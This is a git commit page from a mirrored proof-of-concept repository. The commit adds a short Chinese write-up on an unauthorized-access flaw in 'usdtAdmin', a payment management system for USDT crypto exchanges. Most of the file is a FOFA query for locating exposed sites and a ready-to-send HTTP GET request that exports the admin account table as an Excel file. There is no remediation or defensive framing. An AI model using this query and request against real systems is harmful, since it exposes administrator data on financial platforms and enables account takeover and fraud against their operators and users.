admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-04 18:06:34 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create usdtAdmin收款管理系统存在excel敏感信息泄露.md

Browse Source
This commit is contained in:
Rainyseason 2025-09-01 16:07:28 +08:00 committed by GitHub
parent 113ae22df5
commit 8c289d3f71
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 15 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
wpoc/虚拟币买卖USDT场外交易所/usdtAdmin收款管理系统存在excel敏感信息泄露.md Normal file
View File

@ -0,0 +1,15 @@
# usdtAdmin收款管理系统存在excel敏感信息泄露
虚拟币买卖USDT场外交易所由于在鉴权方面存在疏漏导致了可未授权访问从而导致信息泄露
## fofa
```
"/usdtmerchant/login/reg.html"
```
## poc
```javascript
GET /index/getway/excel?down=1&table=ea_system_admin&shunxu=desc&number=100 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
```